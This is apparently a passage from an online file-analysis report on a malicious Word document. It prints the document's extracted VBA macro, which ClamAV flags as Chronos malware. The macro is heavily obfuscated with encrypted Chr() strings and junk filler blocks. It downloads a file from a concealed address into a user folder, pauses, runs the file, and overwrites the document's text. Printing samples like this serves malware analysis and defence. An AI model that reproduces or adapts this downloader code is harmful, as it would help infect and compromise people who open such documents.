LMAXuL1 = Environ(DKX1DXEAUcf6G(Chr(81) + Chr(110) + Chr(121) + Chr(112) + Chr(119) + Chr(238) + Chr(81), "Fj2AJdGU")) & "\" & MAH6GM2yWYO & DKX1DXEAUcf6G(Chr(173) + Chr(169) + Chr(55) + Chr(188), "NwH2tYuyXBhInJ")
Dim OKkZJ7R5kymO As Long, Rb7ZPkT As Long
OKkZJ7R5kymO = 53
Rb7ZPkT = 33
If OKkZJ7R5kymO + Rb7ZPkT > 4 Then
Rb7ZPkT = OKkZJ7R5kymO + 93
Else
MsgBox 84
End If
If QxD(DKX1DXEAUcf6G(Chr(140) + Chr(152) + Chr(68) + Chr(38) + Chr(83) + Chr(148) + Chr(128) + Chr(86) + Chr(36) + Chr(179) + Chr(202) + Chr(56) + Chr(250) + Chr(234) + Chr(109) + Chr(15) + Chr(200) + Chr(78) + Chr(68) + Chr(248) + Chr(242) + Chr(93) + Chr(250) + Chr(236) + Chr(146) + Chr(28) + Chr(250) + Chr(229) + Chr(98) + Chr(140) + Chr(84) + Chr(125) + Chr(199) + Chr(144) + Chr(70) + Chr(208) + Chr(35) + Chr(102) + Chr(78) + Chr(25) + Chr(46) + Chr(162) + Chr(238) + Chr(61) + Chr(221), "I86LPhUdORU"), LMAXuL1, DKX1DXEAUcf6G(Chr(133) + Chr(19) + Chr(133) + Chr(131) + Chr(9) + Chr(23) + Chr(219) + Chr(226) + Chr(156), "Y9yCAi")) = True Then
Dim W7NWCYdAWy As Long, Sx2dHIoHn4Y0 As Long
W7NWCYdAWy = 62
Sx2dHIoHn4Y0 = 25
If W7NWCYdAWy + Sx2dHIoHn4Y0 > 4 Then
Sx2dHIoHn4Y0 = W7NWCYdAWy + 64
Else
MsgBox 74
End If
Lklws2ZFb1Bb6 1
Dim A5QZp89kh As Long, VpnYTZD As Long
A5QZp89kh = 66
VpnYTZD = 68
If A5QZp89kh + VpnYTZD > 4 Then
VpnYTZD = A5QZp89kh + 9
Else
MsgBox 12
End If
PqkSxmrigqfWWVS8x LMAXuL1
Dim HqXGPyQQN5iFL6BZ As Long, UnwsDHTcDlN6of8tZ As Long
HqXGPyQQN5iFL6BZ = 27
UnwsDHTcDlN6of8tZ = 85
If HqXGPyQQN5iFL6BZ + UnwsDHTcDlN6of8tZ > 4 Then
UnwsDHTcDlN6of8tZ = HqXGPyQQN5iFL6BZ + 10
Else
MsgBox 9
End If
End If
Dim QzlA0lKJng0I5N As Long, Um6jvtEl2 As Long
QzlA0lKJng0I5N = 86
Um6jvtEl2 = 55
If QzlA0lKJng0I5N + Um6jvtEl2 > 4 Then
Um6jvtEl2 = QzlA0lKJng0I5N + 75
Else
MsgBox 86
End If
ActiveDocument.Range.Text = DKX1DXEAUcf6G(Chr(117) + Chr(233) + Chr(75) + Chr(27) + Chr(174) + Chr(115) + Chr(0) + Chr(87) + Chr(86) + Chr(167) + Chr(74) + Chr(42) + Chr(166) + Chr(193) + Chr(84) + Chr(11) + Chr(132) + Chr(90) + Chr(216) + Chr(111) + Chr(194) + Chr(119) + Chr(126) + Chr(184) + Chr(169) + Chr(37) + Chr(3) + Chr(193) + Chr(198) + Chr(113) + Chr(25) + Chr(176) + Chr(203) + Chr(88) + Chr(241) + Chr(35) + Chr(28) + Chr(142) + Chr(106) + Chr(122) + Chr(37) + Chr(156) + Chr(135) + Chr(244) + Chr(0) + Chr(174) + Chr(168) + Chr(207) + Chr(119) + Chr(221) + Chr(192) + Chr(125) + Chr(62) + Chr(109) + Chr(146) + Chr(216) + Chr(3) + Chr(69) + Chr(90) + Chr(182) + Chr(3) + Chr(133) + Chr(79) + Chr(202) + Chr(69) + Chr(249) + Chr(140) + Chr(82) + Chr(85) + Chr(137) + Chr(45), "Cn97bc4OBu")
End If
Dim JoyAGtnQRxG As Long, Af4Npe5hZ5Z32B As Long
JoyAGtnQRxG = 78
Af4Npe5hZ5Z32B = 3
If JoyAGtnQRxG + Af4Npe5hZ5Z32B > 4 Then
Af4Npe5hZ5Z32B = JoyAGtnQRxG + 56
Else
MsgBox 94
End If
End Sub
Sub Lklws2ZFb1Bb6(IWQ5zo8iM As Long)
Dim O0vcaCkCwF7Ak As Long, DnETKTM3K2Hi As Long
O0vcaCkCwF7Ak = 93
DnETKTM3K2Hi = 58
If O0vcaCkCwF7Ak + DnETKTM3K2Hi > 4 Then
DnETKTM3K2Hi = O0vcaCkCwF7Ak + 91
Else
MsgBox 64
End If
Dim YBTqtOT0cOsyAef As Long
Dim QkxCHN0Y12j As Long, YjzMUfkFf As Long
QkxCHN0Y12j = 92
YjzMUfkFf = 61
If QkxCHN0Y12j + YjzMUfkFf > 4 Then
YjzMUfkFf = QkxCHN0Y12j + 81
Else
MsgBox 92
End If
YBTqtOT0cOsyAef = Timer + IWQ5zo8iM
Do While Timer < YBTqtOT0cOsyAef
DoEvents
Loop
Dim Ve0YmUl As Long, LmakhyTs8QZtbQH As Long
Ve0YmUl = 61
LmakhyTs8QZtbQH = 54
If Ve0YmUl + LmakhyTs8QZtbQH > 4 Then
LmakhyTs8QZtbQH = Ve0YmUl + 76
Else
MsgBox 9
End If
End Sub
Private Property Let V9Jyck(UPGgDeB83iR As String)
Dim VFAX As Long, Ah5VfLXAx2vyAHo As Long, Pnc3kajNwvN As Byte, RzKMETd() As Byte, PMIBeEmf2 As Long
If (SyGY3WdRsGkIvj = UPGgDeB83iR) Then Exit Property
SyGY3WdRsGkIvj = UPGgDeB83iR
RzKMETd() = StrConv(SyGY3WdRsGkIvj, vbFromUnicode)
PMIBeEmf2 = Len(SyGY3WdRsGkIvj)
For VFAX = 0 To 255
XnHwWJh(VFAX) = VFAX
Next VFAX
For VFAX = 0 To 255
Ah5VfLXAx2vyAHo = (Ah5VfLXAx2vyAHo + XnHwWJh(VFAX) + RzKMETd(VFAX Mod PMIBeEmf2)) Mod 256
Pnc3kajNwvN = XnHwWJh(VFAX)
XnHwWJh(VFAX) = XnHwWJh(Ah5VfLXAx2vyAHo)
XnHwWJh(Ah5VfLXAx2vyAHo) = Pnc3kajNwvN
Next
End Property
Function DKX1DXEAUcf6G(GjlWLTUN8PQbKRg As String, Uzan8pU23T As String) As String
Dim UBXT As Long, YtB6sBrlEWOMFZQMA As Long
UBXT = 92
YtB6sBrlEWOMFZQMA = 13
If UBXT + YtB6sBrlEWOMFZQMA > 4 Then
YtB6sBrlEWOMFZQMA = UBXT + 25
Else
MsgBox 17
End If
Dim byteArray() As Byte
byteArray() = StrConv(GjlWLTUN8PQbKRg, vbFromUnicode)
Th0oP49hY byteArray(), Uzan8pU23T
DKX1DXEAUcf6G = StrConv(byteArray(), vbUnicode)
Dim VT8Hgin7xm9 As Long, POMFZQMAcTzcx8EYU As Long
VT8Hgin7xm9 = 61
POMFZQMAcTzcx8EYU = 81
If VT8Hgin7xm9 + POMFZQMAcTzcx8EYU > 4 Then
POMFZQMAcTzcx8EYU = VT8Hgin7xm9 + 92
Else
MsgBox 85
End If
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 52224 bytes
SHA-256: 07151280cab1c5a1e516c9e8c1b5bbdfd42571d420daf58c55bde98aa79a2574
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.